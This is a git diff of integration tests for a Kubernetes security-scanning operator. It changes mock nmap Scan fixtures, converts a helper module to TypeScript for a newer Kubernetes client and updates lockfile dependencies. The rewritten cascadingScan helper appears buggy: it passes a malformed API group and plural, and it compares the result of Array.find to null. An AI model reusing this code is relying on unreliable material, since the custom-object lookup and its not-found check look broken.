{}, - "f:initContainers": {}, - "f:parameters": {}, - "f:resourceMode": {}, - "f:scanType": {}, - "f:volumeMounts": {}, - "f:volumes": {} - } + "apiVersion": "execution.securecodebox.io/v1", + "kind": "Scan", + "metadata": { + "creationTimestamp": "2024-01-16T14:40:59Z", + "generateName": "nmap-example-", + "generation": 1, + "managedFields": [ + { + "apiVersion": "execution.securecodebox.io/v1", + "fieldsType": "FieldsV1", + "fieldsV1": { + "f:metadata": { + "f:generateName": {} }, - "manager": "unknown", - "operation": "Update", - "time": "2024-01-16T14:40:59Z" - } - ], - "name": "nmap-example-pw8vt", - "namespace": "integration-tests", - "resourceVersion": "1867", - "uid": "4ebccf10-ac84-4e85-91bc-1e4d60b45697" - }, - "spec": { - "initContainers": [], - "parameters": [ - "-p80", - "old-wordpress.demo-targets.svc" - ], - "resourceMode": "namespaceLocal", - "scanType": "nmap", - "volumeMounts": [], - "volumes": [] - } + "f:spec": { + ".": {}, + "f:initContainers": {}, + "f:parameters": {}, + "f:resourceMode": {}, + "f:scanType": {}, + "f:volumeMounts": {}, + "f:volumes": {} + } + }, + "manager": "unknown", + "operation": "Update", + "time": "2024-01-16T14:40:59Z" + } + ], + "name": "nmap-example-pw8vt", + "namespace": "integration-tests", + "resourceVersion": "1867", + "uid": "4ebccf10-ac84-4e85-91bc-1e4d60b45697" + }, + "spec": { + "initContainers": [], + "parameters": [ + "-p80", + "old-wordpress.demo-targets.svc" + ], + "resourceMode": "namespaceLocal", + "scanType": "nmap", + "volumeMounts": [], + "volumes": [] } } \ No newline at end of file diff --git a/tests/integration/__testFiles__/mockScanStatusResponse.json b/tests/integration/__testFiles__/mockScanStatusResponse.json index d1d2513e51..fc82d5180b 100644 --- a/tests/integration/__testFiles__/mockScanStatusResponse.json +++ b/tests/integration/__testFiles__/mockScanStatusResponse.json @@ -1,89 +1,87 @@ { - "body": { - "apiVersion": "execution.securecodebox.io/v1", - "kind": "Scan", - "metadata": { - "creationTimestamp": "2024-01-16T14:45:28Z", - "finalizers": [ - "s3.storage.securecodebox.io" - ], - "generateName": "nmap-example-", - "generation": 2, - "managedFields": [ - { - "apiVersion": "execution.securecodebox.io/v1", - "fieldsType": "FieldsV1", - "fieldsV1": { - "f:metadata": { - "f:finalizers": { - ".": {}, - "v:\"s3.storage.securecodebox.io\"": {} - } - }, - "f:spec": { - "f:resources": {} + "apiVersion": "execution.securecodebox.io/v1", + "kind": "Scan", + "metadata": { + "creationTimestamp": "2024-01-16T14:45:28Z", + "finalizers": [ + "s3.storage.securecodebox.io" + ], + "generateName": "nmap-example-", + "generation": 2, + "managedFields": [ + { + "apiVersion": "execution.securecodebox.io/v1", + "fieldsType": "FieldsV1", + "fieldsV1": { + "f:metadata": { + "f:finalizers": { + ".": {}, + "v:\"s3.storage.securecodebox.io\"": {} } }, - "manager": "manager", - "operation": "Update", - "time": "2024-01-16T14:45:28Z" + "f:spec": { + "f:resources": {} + } }, - { - "apiVersion": "execution.securecodebox.io/v1", - "fieldsType": "FieldsV1", - "fieldsV1": { - "f:status": { + "manager": "manager", + "operation": "Update", + "time": "2024-01-16T14:45:28Z" + }, + { + "apiVersion": "execution.securecodebox.io/v1", + "fieldsType": "FieldsV1", + "fieldsV1": { + "f:status": { + ".": {}, + "f:findingDownloadLink": {}, + "f:findingHeadLink": {}, + "f:findings": { ".": {}, - "f:findingDownloadLink": {}, - "f:findingHeadLink": {}, - "f:findings": { - ".": {}, - "f:severities": {} - }, - "f:rawResultDownloadLink": {}, - "f:rawResultFile": {}, - "f:rawResultHeadLink": {}, - "f:rawResultType": {}, - "f:state": {} - } - }, - "manager": "manager", - "operation": "Update", - "subresource": "status", - "time": "2024-01-16T14:45:28Z" - } - ], - "name": "nmap-example-c24gt", - "namespace": "integration-tests", - "resourceVersion": "2399", - "uid": "5d2ef0e2-ad11-4e58-80d0-5168a137da17" - }, - "spec": { - "parameters": [ - "-p80", - "old-wordpress.demo-targets.svc" - ], - "resourceMode": "namespaceLocal", - "resources": {}, - "scanType": "nmap" - }, - "status": { - "findingDownloadLink": "http://securecodebox-operator-minio.securecodebox-system.svc.cluster.local:9000/securecodebox/scan-c4c2b6ae-f8a1-474d-88ec-c739f6e55f56/findings.json?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=admin%2F20240116%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240116T160849Z&X-Amz-Expires=604800&X-Amz-SignedHeaders=host&X-Amz-Signature=5944f10813f6127d96a3889b06c8256765c3a739db1e23f650ee6ec9ed956b20", - "findingHeadLink": "http://securecodebox-operator-minio.securecodebox-system.svc.cluster.local:9000/securecodebox/scan-c4c2b6ae-f8a1-474d-88ec-c739f6e55f56/findings.json?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=admin%2F20240116%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240116T160849Z&X-Amz-Expires=43200&X-Amz-SignedHeaders=host&X-Amz-Signature=45833109b8ea8d43df51b535730aece4cec1dbf6557a12acd1b95cdbce1f221e", - "findings": { - "categories": { - "Vulnerability": 24 + "f:severities": {} + }, + "f:rawResultDownloadLink": {}, + "f:rawResultFile": {}, + "f:rawResultHeadLink": {}, + "f:rawResultType": {}, + "f:state": {} + } }, - "count": 24, - "severities": { - "high": 24 - } + "manager": "manager", + "operation": "Update", + "subresource": "status", + "time": "2024-01-16T14:45:28Z" + } + ], + "name": "nmap-example-c24gt", + "namespace": "integration-tests", + "resourceVersion": "2399", + "uid": "5d2ef0e2-ad11-4e58-80d0-5168a137da17" + }, + "spec": { + "parameters": [ + "-p80", + "old-wordpress.demo-targets.svc" + ], + "resourceMode": "namespaceLocal", + "resources": {}, + "scanType": "nmap" + }, + "status": { + "findingDownloadLink": "http://securecodebox-operator-minio.securecodebox-system.svc.cluster.local:9000/securecodebox/scan-c4c2b6ae-f8a1-474d-88ec-c739f6e55f56/findings.json?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=admin%2F20240116%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240116T160849Z&X-Amz-Expires=604800&X-Amz-SignedHeaders=host&X-Amz-Signature=5944f10813f6127d96a3889b06c8256765c3a739db1e23f650ee6ec9ed956b20", + "findingHeadLink": "http://securecodebox-operator-minio.securecodebox-system.svc.cluster.local:9000/securecodebox/scan-c4c2b6ae-f8a1-474d-88ec-c739f6e55f56/findings.json?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=admin%2F20240116%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240116T160849Z&X-Amz-Expires=43200&X-Amz-SignedHeaders=host&X-Amz-Signature=45833109b8ea8d43df51b535730aece4cec1dbf6557a12acd1b95cdbce1f221e", + "findings": { + "categories": { + "Vulnerability": 24 }, - "rawResultDownloadLink": "http://securecodebox-operator-minio.securecodebox-system.svc.cluster.local:9000/securecodebox/scan-c4c2b6ae-f8a1-474d-88ec-c739f6e55f56/nmap-result.xml?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=admin%2F20240116%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240116T160849Z&X-Amz-Expires=604800&X-Amz-SignedHeaders=host&X-Amz-Signature=0a91e1756a42fa40ca9bf1bb448ec36c544dd5af4b76c8bc3e91debbb68e349e", - "rawResultFile": "nmap-result.xml", - "rawResultHeadLink": "http://securecodebox-operator-minio.securecodebox-system.svc.cluster.local:9000/securecodebox/scan-c4c2b6ae-f8a1-474d-88ec-c739f6e55f56/nmap-result.xml?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=admin%2F20240116%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240116T160849Z&X-Amz-Expires=43200&X-Amz-SignedHeaders=host&X-Amz-Signature=d09a78fe0e563ac70a75c908319085699894a9eca04d4a32d723862e748e9416", - "rawResultType": "nmap-xml", - "state": "Done" - } + "count": 24, + "severities": { + "high": 24 + } + }, + "rawResultDownloadLink": "http://securecodebox-operator-minio.securecodebox-system.svc.cluster.local:9000/securecodebox/scan-c4c2b6ae-f8a1-474d-88ec-c739f6e55f56/nmap-result.xml?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=admin%2F20240116%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240116T160849Z&X-Amz-Expires=604800&X-Amz-SignedHeaders=host&X-Amz-Signature=0a91e1756a42fa40ca9bf1bb448ec36c544dd5af4b76c8bc3e91debbb68e349e", + "rawResultFile": "nmap-result.xml", + "rawResultHeadLink": "http://securecodebox-operator-minio.securecodebox-system.svc.cluster.local:9000/securecodebox/scan-c4c2b6ae-f8a1-474d-88ec-c739f6e55f56/nmap-result.xml?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=admin%2F20240116%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240116T160849Z&X-Amz-Expires=43200&X-Amz-SignedHeaders=host&X-Amz-Signature=d09a78fe0e563ac70a75c908319085699894a9eca04d4a32d723862e748e9416", + "rawResultType": "nmap-xml", + "state": "Done" } } \ No newline at end of file diff --git a/tests/integration/__testFiles__/mockScanStatusResponse_Errored.json b/tests/integration/__testFiles__/mockScanStatusResponse_Errored.json index 8857e69529..bce8f2d594 100644 --- a/tests/integration/__testFiles__/mockScanStatusResponse_Errored.json +++ b/tests/integration/__testFiles__/mockScanStatusResponse_Errored.json @@ -1,82 +1,80 @@ { - "body": { - "apiVersion": "execution.securecodebox.io/v1", - "kind": "Scan", - "metadata": { - "creationTimestamp": "2024-01-16T14:45:28Z", - "finalizers": [ - "s3.storage.securecodebox.io" - ], - "generateName": "nmap-example-", - "generation": 2, - "managedFields": [ - { - "apiVersion": "execution.securecodebox.io/v1", - "fieldsType": "FieldsV1", - "fieldsV1": { - "f:metadata": { - "f:finalizers": { - ".": {}, - "v:\"s3.storage.securecodebox.io\"": {} - } - }, - "f:spec": { - "f:resources": {} + "apiVersion": "execution.securecodebox.io/v1", + "kind": "Scan", + "metadata": { + "creationTimestamp": "2024-01-16T14:45:28Z", + "finalizers": [ + "s3.storage.securecodebox.io" + ], + "generateName": "nmap-example-", + "generation": 2, + "managedFields": [ + { + "apiVersion": "execution.securecodebox.io/v1", + "fieldsType": "FieldsV1", + "fieldsV1": { + "f:metadata": { + "f:finalizers": { + ".": {}, + "v:\"s3.storage.securecodebox.io\"": {} } }, - "manager": "manager", - "operation": "Update", - "time": "2024-01-16T14:45:28Z" + "f:spec": { + "f:resources": {} + } }, - { - "apiVersion": "execution.securecodebox.io/v1", - "fieldsType": "FieldsV1", - "fieldsV1": { - "f:status": { + "manager": "manager", + "operation": "Update", + "time": "2024-01-16T14:45:28Z" + }, + { + "apiVersion": "execution.securecodebox.io/v1", + "fieldsType": "FieldsV1", + "fieldsV1": { + "f:status": { + ".": {}, + "f:findingDownloadLink": {}, + "f:findingHeadLink": {}, + "f:findings": { ".": {}, - "f:findingDownloadLink": {}, - "f:findingHeadLink": {}, - "f:findings": { - ".": {}, - "f:severities": {} - }, - "f:rawResultDownloadLink": {}, - "f:rawResultFile": {}, - "f:rawResultHeadLink": {}, - "f:rawResultType": {}, - "f:state": {} - } - }, - "manager": "manager", - "operation": "Update", - "subresource": "status", - "time": "2024-01-16T14:45:28Z" - } - ], - "name": "nmap-example-c24gt", - "namespace": "integration-tests", - "resourceVersion": "2399", - "uid": "5d2ef0e2-ad11-4e58-80d0-5168a137da17" - }, - "spec": { - "parameters": [ - "-p80", - "old-wordpress.demo-targets.svc" - ], - "resourceMode": "namespaceLocal", - "resources": {}, - "scanType": "nmap" - }, - "status": { - "findingDownloadLink": "http://securecodebox-operator-minio.securecodebox-system.svc.cluster.local:9000/securecodebox/scan-c4c2b6ae-f8a1-474d-88ec-c739f6e55f56/findings.json?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=admin%2F20240116%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240116T160849Z&X-Amz-Expires=604800&X-Amz-SignedHeaders=host&X-Amz-Signature=5944f10813f6127d96a3889b06c8256765c3a739db1e23f650ee6ec9ed956b20", - "findingHeadLink": "http://securecodebox-operator-minio.securecodebox-system.svc.cluster.local:9000/securecodebox/scan-c4c2b6ae-f8a1-474d-88ec-c739f6e55f56/findings.json?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=admin%2F20240116%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240116T160849Z&X-Amz-Expires=43200&X-Amz-SignedHeaders=host&X-Amz-Signature=45833109b8ea8d43df51b535730aece4cec1dbf6557a12acd1b95cdbce1f221e", - "findings": {}, - "rawResultDownloadLink": "http://securecodebox-operator-minio.securecodebox-system.svc.cluster.local:9000/securecodebox/scan-c4c2b6ae-f8a1-474d-88ec-c739f6e55f56/nmap-result.xml?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=admin%2F20240116%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240116T160849Z&X-Amz-Expires=604800&X-Amz-SignedHeaders=host&X-Amz-Signature=0a91e1756a42fa40ca9bf1bb448ec36c544dd5af4b76c8bc3e91debbb68e349e", - "rawResultFile": "nmap-result.xml", - "rawResultHeadLink": "http://securecodebox-operator-minio.securecodebox-system.svc.cluster.local:9000/securecodebox/scan-c4c2b6ae-f8a1-474d-88ec-c739f6e55f56/nmap-result.xml?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=admin%2F20240116%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240116T160849Z&X-Amz-Expires=43200&X-Amz-SignedHeaders=host&X-Amz-Signature=d09a78fe0e563ac70a75c908319085699894a9eca04d4a32d723862e748e9416", - "rawResultType": "nmap-xml", - "state": "Errored", - "errorDescription": "Mocked Error" - } + "f:severities": {} + }, + "f:rawResultDownloadLink": {}, + "f:rawResultFile": {}, + "f:rawResultHeadLink": {}, + "f:rawResultType": {}, + "f:state": {} + } + }, + "manager": "manager", + "operation": "Update", + "subresource": "status", + "time": "2024-01-16T14:45:28Z" + } + ], + "name": "nmap-example-c24gt", + "namespace": "integration-tests", + "resourceVersion": "2399", + "uid": "5d2ef0e2-ad11-4e58-80d0-5168a137da17" + }, + "spec": { + "parameters": [ + "-p80", + "old-wordpress.demo-targets.svc" + ], + "resourceMode": "namespaceLocal", + "resources": {}, + "scanType": "nmap" + }, + "status": { + "findingDownloadLink": "http://securecodebox-operator-minio.securecodebox-system.svc.cluster.local:9000/securecodebox/scan-c4c2b6ae-f8a1-474d-88ec-c739f6e55f56/findings.json?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=admin%2F20240116%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240116T160849Z&X-Amz-Expires=604800&X-Amz-SignedHeaders=host&X-Amz-Signature=5944f10813f6127d96a3889b06c8256765c3a739db1e23f650ee6ec9ed956b20", + "findingHeadLink": "http://securecodebox-operator-minio.securecodebox-system.svc.cluster.local:9000/securecodebox/scan-c4c2b6ae-f8a1-474d-88ec-c739f6e55f56/findings.json?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=admin%2F20240116%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240116T160849Z&X-Amz-Expires=43200&X-Amz-SignedHeaders=host&X-Amz-Signature=45833109b8ea8d43df51b535730aece4cec1dbf6557a12acd1b95cdbce1f221e", + "findings": {}, + "rawResultDownloadLink": "http://securecodebox-operator-minio.securecodebox-system.svc.cluster.local:9000/securecodebox/scan-c4c2b6ae-f8a1-474d-88ec-c739f6e55f56/nmap-result.xml?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=admin%2F20240116%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240116T160849Z&X-Amz-Expires=604800&X-Amz-SignedHeaders=host&X-Amz-Signature=0a91e1756a42fa40ca9bf1bb448ec36c544dd5af4b76c8bc3e91debbb68e349e", + "rawResultFile": "nmap-result.xml", + "rawResultHeadLink": "http://securecodebox-operator-minio.securecodebox-system.svc.cluster.local:9000/securecodebox/scan-c4c2b6ae-f8a1-474d-88ec-c739f6e55f56/nmap-result.xml?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=admin%2F20240116%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240116T160849Z&X-Amz-Expires=43200&X-Amz-SignedHeaders=host&X-Amz-Signature=d09a78fe0e563ac70a75c908319085699894a9eca04d4a32d723862e748e9416", + "rawResultType": "nmap-xml", + "state": "Errored", + "errorDescription": "Mocked Error" } } \ No newline at end of file diff --git a/tests/integration/helpers.test.js b/tests/integration/helpers.test.js index 4275d39126..bc0142935a 100644 --- a/tests/integration/helpers.test.js +++ b/tests/integration/helpers.test.js @@ -27,6 +27,7 @@ describe("Kubernetes interaction tests", () => { beforeEach(() => { jest.clearAllMocks(); }); + describe("scan function", () => { it("should create a scan and return findings on successful completion", async () => { const mockScanCreationResponse = require("./__testFiles__/mockScanCreationResponse.json"); @@ -55,10 +56,67 @@ describe("Kubernetes interaction tests", () => { k8sApi, ); - expect(findings).toBeDefined(); - expect(findings).toMatchSnapshot(); - expect(mockK8sCRDApi.createNamespacedCustomObject).toMatchSnapshot(); - expect(mockK8sCRDApi.getNamespacedCustomObjectStatus).toMatchSnapshot(); + expect(findings).toMatchInlineSnapshot(` + { + "categories": { + "Vulnerability": 24, + }, + "count": 24, + "severities": { + "high": 24, + }, + } + `); + expect(mockK8sCRDApi.createNamespacedCustomObject.mock.calls) + .toMatchInlineSnapshot(` + [ + [ + { + "body": { + "apiVersion": "execution.securecodebox.io/v1", + "kind": "Scan", + "metadata": { + "generateName": "nmap-example-", + }, + "spec": { + "initContainers": [], + "parameters": [], + "scanType": "nmap", + "volumeMounts": [], + "volumes": [], + }, + }, + "group": "execution.securecodebox.io", + "namespace": "integration-tests", + "plural": "scans", + "version": "v1", + }, + ], + ] + `); + expect(mockK8sCRDApi.getNamespacedCustomObjectStatus.mock.calls) + .toMatchInlineSnapshot(` + [ + [ + { + "group": "execution.securecodebox.io", + "name": "nmap-example-pw8vt", + "namespace": "integration-tests", + "plural": "scans", + "version": "v1", + }, + ], + [ + { + "group": "execution.securecodebox.io", + "name": "nmap-example-pw8vt", + "namespace": "integration-tests", + "plural": "scans", + "version": "v1", + }, + ], + ] + `); }); it("should throw an error if the scan fails", async () => { @@ -136,9 +194,19 @@ describe("Kubernetes interaction tests", () => { k8sApi, ); - expect(findings).toBeDefined(); - expect(findings).toMatchSnapshot(); + expect(findings).toMatchInlineSnapshot(` + { + "categories": { + "Discovered Credentials": 1, + }, + "count": 1, + "severities": { + "high": 1, + }, + } + `); }); + it("should throw an error if the scan fails", async () => { const mockScanCreationResponse = require("./__testFiles__/mockCascadingScanCreationResponse.json"); const mockScanStatusResponse_Errored = require("./__testFiles__/mockCascadingScanStatusResponse_Errored.json"); diff --git a/tests/integration/helpers.js b/tests/integration/helpers.ts similarity index 72% rename from tests/integration/helpers.js rename to tests/integration/helpers.ts index e86f517ed3..e61aa70d7b 100644 --- a/tests/integration/helpers.js +++ b/tests/integration/helpers.ts @@ -2,22 +2,55 @@ // // SPDX-License-Identifier: Apache-2.0 -const k8s = require("@kubernetes/client-node"); - -const kc = new k8s.KubeConfig(); -kc.loadFromDefault(); +import { + KubeConfig, + CustomObjectsApi, + BatchV1Api, + CoreV1Api, +} from "@kubernetes/client-node"; + +const kc = new KubeConfig(); + +// connect to localhost cluster forwarded via kubectl proxy to workaround auth issues in bun: https://github.com/oven-sh/bun/issues/7332 +kc.loadFromOptions({ + clusters: [ + { + name: "localhost", + cluster: { + server: "http://localhost:8001", + skipTLSVerify: true, // no tls on proxy + }, + }, + ], + users: [ + { + name: "default", + }, + ], + contexts: [ + { + name: "default", + context: { + cluster: "localhost", + user: "default", + namespace: "integration-tests", + }, + }, + ], + currentContext: "default", +}); -let k8sCRDApi, k8sBatchApi, k8sPodsApi; +let k8sCRDApi: CustomObjectsApi, k8sBatchApi: BatchV1Api, k8sPodsApi: CoreV1Api; function getKubernetesAPIs() { if (!k8sCRDApi) { - k8sCRDApi = kc.makeApiClient(k8s.CustomObjectsApi); + k8sCRDApi = kc.makeApiClient(CustomObjectsApi); } if (!k8sBatchApi) { - k8sBatchApi = kc.makeApiClient(k8s.BatchV1Api); + k8sBatchApi = kc.makeApiClient(BatchV1Api); } if (!k8sPodsApi) { - k8sPodsApi = kc.makeApiClient(k8s.CoreV1Api); + k8sPodsApi = kc.makeApiClient(CoreV1Api); } return { k8sCRDApi, k8sBatchApi, k8sPodsApi }; @@ -27,62 +60,54 @@ let namespace = "integration-tests"; const sleep = (ms) => new Promise((resolve) => setTimeout(resolve, ms * 1000)); async function deleteScan(name, k8sApis = getKubernetesAPIs()) { - await k8sApis.k8sCRDApi.deleteNamespacedCustomObject( - "execution.securecodebox.io", - "v1", + await k8sApis.k8sCRDApi.deleteNamespacedCustomObject({ + group: "execution.securecodebox.io", + version: "v1", + plural: "scans", + name: name, namespace, - "scans", - name, - {}, - ); + }); } async function getScan(name, k8sApis = getKubernetesAPIs()) { - const { body: scan } = - await k8sApis.k8sCRDApi.getNamespacedCustomObjectStatus( - "execution.securecodebox.io", - "v1", - namespace, - "scans", - name, - ); - return scan; + return await k8sApis.k8sCRDApi.getNamespacedCustomObjectStatus({ + group: "execution.securecodebox.io", + version: "v1", + plural: "scans", + name, + namespace, + }); } async function displayAllLogsForJob(jobName, k8sApis = getKubernetesAPIs()) { console.log(`Listing logs for Job '${jobName}':`); - const { - body: { items: pods }, - } = await k8sApis.k8sPodsApi.listNamespacedPod( + const pods = await k8sApis.k8sPodsApi.listNamespacedPod({ + labelSelector: `job-name=${jobName}`, namespace, - true, - undefined, - undefined, - undefined, - `job-name=${jobName}`, - ); - - if (pods.length === 0) { + }); + + if (pods.items.length === 0) { console.log(`No Pods found for Job '${jobName}'`); } - for (const pod of pods) { + for (const pod of pods.items) { console.log( - `Listing logs for Job '${jobName}' > Pod '${pod.metadata.name}':`, + `Listing logs for Job '${jobName}' > Pod '${pod.metadata?.name}':`, ); - for (const container of pod.spec.containers) { + for (const container of pod.spec?.containers || []) { try { - const response = await k8sApis.k8sPodsApi.readNamespacedPodLog( - pod.metadata.name, + if (!pod.metadata?.name) throw new Error("pod name is undefined"); + const logs = await k8sApis.k8sPodsApi.readNamespacedPodLog({ + name: pod.metadata.name, namespace, - container.name, - ); + container: container.name, + }); console.log(`Container ${container.name}:`); - console.log(response.body); + console.log(logs); } catch (exception) { console.error( - `Failed to display logs of container ${container.name}: ${exception.body.message}`, + `Failed to display logs of container ${container.name}: ${exception}`, ); } } @@ -91,18 +116,19 @@ async function displayAllLogsForJob(jobName, k8sApis = getKubernetesAPIs()) { async function logJobs(k8sApis = getKubernetesAPIs()) { try { - const { body: jobs } = - await k8sApis.k8sBatchApi.listNamespacedJob(namespace); + const jobs = await k8sApis.k8sBatchApi.listNamespacedJob({ + namespace, + }); console.log("Logging spec & status of jobs in namespace"); for (const job of jobs.items) { - console.log(`Job: '${job.metadata.name}' Spec:`); + console.log(`Job: '${job.metadata?.name}' Spec:`); console.log(JSON.stringify(job.spec, null, 2)); - console.log(`Job: '${job.metadata.name}' Status:`); + console.log(`Job: '${job.metadata?.name}' Status:`); console.log(JSON.stringify(job.status, null, 2)); - await displayAllLogsForJob(job.metadata.name, k8sApis); + await displayAllLogsForJob(job.metadata?.name, k8sApis); } } catch (error) { console.error("Failed to list Jobs"); @@ -131,7 +157,7 @@ async function disasterRecovery(scanName, k8sApis) { * @param {PodsApi} PodsApi kubernetes api client for CoreV1Api. Optional, will be created if not provided. * @returns {scan.findings} returns findings { categories, severities, count } */ -async function scan( +export async function scan( name, scanType, parameters = [], @@ -157,15 +183,15 @@ async function scan( initContainers, }, }; - const { body } = await k8sApis.k8sCRDApi.createNamespacedCustomObject( - "execution.securecodebox.io", - "v1", + const scan = await k8sApis.k8sCRDApi.createNamespacedCustomObject({ + group: "execution.securecodebox.io", + version: "v1", + plural: "scans", namespace, - "scans", - scanDefinition, - ); + body: scanDefinition, + }); - const actualName = body.metadata.name; + const actualName = scan.metadata.name; for (let i = 0; i < timeout; i++) { await sleep(1); @@ -206,7 +232,7 @@ async function scan( * * @returns {scan.findings} returns findings { categories, severities, count } */ -async function cascadingScan( +export async function cascadingScan( name, scanType, parameters = [], @@ -230,15 +256,15 @@ async function cascadingScan( }, }; - const { body } = await k8sApis.k8sCRDApi.createNamespacedCustomObject( - "execution.securecodebox.io", - "v1", + const scan = await k8sApis.k8sCRDApi.createNamespacedCustomObject({ + group: "execution.securecodebox.io", + version: "v1", + plural: "scans", namespace, - "scans", - scanDefinition, - ); + body: scanDefinition, + }); - const actualName = body.metadata.name; + const actualName: string = scan.metadata.name; for (let i = 0; i < timeout; i++) { await sleep(1); @@ -264,33 +290,27 @@ async function cascadingScan( } } - const { body: scans } = await k8sApis.k8sCRDApi.listNamespacedCustomObject( - "execution.securecodebox.io", - "v1", + const scans = await k8sApis.k8sCRDApi.listNamespacedCustomObject({ + group: "execution.securecodebox.io/v1", + version: "v1", + plural: "Scan", namespace, - "scans", - ); + }); - let cascadedScan = null; - - for (const scan of scans.items) { - if ( + const cascadedScan = scans.items.find((scan) => { + return ( scan.metadata.annotations && scan.metadata.annotations["cascading.securecodebox.io/chain"] === nameCascade - ) { - cascadedScan = scan; - break; - } - } - + ); + }); if (cascadedScan === null) { console.warn( `Didn't find matching cascaded scan in available scans: ${JSON.stringify(scans.items, undefined, 2)}`, ); throw new Error(`Didn't find cascaded Scan for ${nameCascade}`); } - const actualNameCascade = cascadedScan.metadata.name; + const actualNameCascade = cascadedScan.metadata?.name; for (let j = 0; j < timeout; j++) { await sleep(1); @@ -321,6 +341,3 @@ async function cascadingScan( throw new Error("timed out while waiting for scan results"); } - -module.exports.scan = scan; -module.exports.cascadingScan = cascadingScan; diff --git a/tests/integration/package-lock.json b/tests/integration/package-lock.json index 1a605ef79b..7f78a260f6 100644 --- a/tests/integration/package-lock.json +++ b/tests/integration/package-lock.json @@ -8,16 +8,13 @@ "name": "@securecodebox/integration-tests", "version": "1.0.0", "license": "Apache-2.0", - "dependencies": { - "@kubernetes/client-node": "^0.19.0", - "@types/jest": "^29.5.14", - "ts-jest": "^29.2.5" - }, "devDependencies": { - "@kubernetes/client-node": "^0.19.0", + "@kubernetes/client-node": "^1.3.0", "@securecodebox/parser-sdk-nodejs": "file:../../parser-sdk/nodejs", + "@types/jest": "^29.5.14", "jest": "^29.7.0", - "prettier": "^3.4.2" + "prettier": "^3.6.0", + "ts-jest": "^29.2.5" } }, "../../parser-sdk/nodejs": { @@ -26,19 +23,18 @@ "dev": true, "license": "Apache-2.0", "dependencies": { - "@kubernetes/client-node": "^0.22.3", + "@kubernetes/client-node": "^1.3.0", "ajv": "^8.17.1", "ajv-draft-04": "^1.0.0", "ajv-formats": "^3.0.1", - "axios": "^1.7.8", - "jsonpointer": "^5.0.1", - "ws": "^8.13.0" + "jsonpointer": "^5.0.1" } }, "node_modules/@ampproject/remapping": { "version": "2.2.1", "resolved": "https://registry.npmjs.org/@ampproject/remapping/-/remapping-2.2.1.tgz", "integrity": "sha512-lFMjJTrFL3j7L9yBxwYfCq2k6qqwHyzuUl/XBnif78PWTJYyL/dfowQHWE3sp6U6ZzqWiiIZnpTMO96zhkjwtg==", + "dev": true, "dependencies": { "@jridgewell/gen-mapping": "^0.3.0", "@jridgewell/trace-mapping": "^0.3.9" @@ -48,13 +44,15 @@ } }, "node_modules/@babel/code-frame": { - "version": "7.26.2", - "resolved": "https://registry.npmjs.org/@babel/code-frame/-/code-frame-7.26.2.tgz", - "integrity": "sha512-RJlIHRueQgwWitWgF8OdFYGZX328Ax5BCemNGlqHfplnRT9ESi8JkFlvaVYbS+UubVY6dpv87Fs2u5M29iNFVQ==", + "version": "7.27.1", + "resolved": "https://registry.npmjs.org/@babel/code-frame/-/code-frame-7.27.1.tgz", + "integrity": "sha512-cjQ7ZlQ0Mv3b47hABuTevyTuYN4i+loJKGeV9flcCgIK37cCXRh+L1bd3iBHlynerhQ7BhCkn2BPbQUL+rGqFg==", + "dev": true, + "license": "MIT", "dependencies": { - "@babel/helper-validator-identifier": "^7.25.9", + "@babel/helper-validator-identifier": "^7.27.1", "js-tokens": "^4.0.0", - "picocolors": "^1.0.0" + "picocolors": "^1.1.1" }, "engines": { "node": ">=6.9.0" @@ -64,6 +62,7 @@ "version": "7.26.2", "resolved": "https://registry.npmjs.org/@babel/compat-data/-/compat-data-7.26.2.tgz", "integrity": "sha512-Z0WgzSEa+aUcdiJuCIqgujCshpMWgUpgOxXotrYPSA53hA3qopNaqcJpyr0hVb1FeWdnqFA35/fUtXgBK8srQg==", + "dev": true, "engines": { "node": ">=6.9.0" } @@ -72,6 +71,7 @@ "version": "7.26.0", "resolved": "https://registry.npmjs.org/@babel/core/-/core-7.26.0.tgz", "integrity": "sha512-i1SLeK+DzNnQ3LL/CswPCa/E5u4lh1k6IAEphON8F+cXt0t9euTshDru0q7/IqMa1PMPz5RnHuHscF8/ZJsStg==", + "dev": true, "dependencies": { "@ampproject/remapping": "^2.2.0", "@babel/code-frame": "^7.26.0", @@ -101,6 +101,7 @@ "version": "7.26.2", "resolved": "https://registry.npmjs.org/@babel/generator/-/generator-7.26.2.tgz", "integrity": "sha512-zevQbhbau95nkoxSq3f/DC/SC+EEOUZd3DYqfSkMhY2/wfSeaHV1Ew4vk8e+x8lja31IbyuUa2uQ3JONqKbysw==", + "dev": true, "dependencies": { "@babel/parser": "^7.26.2", "@babel/types": "^7.26.0", @@ 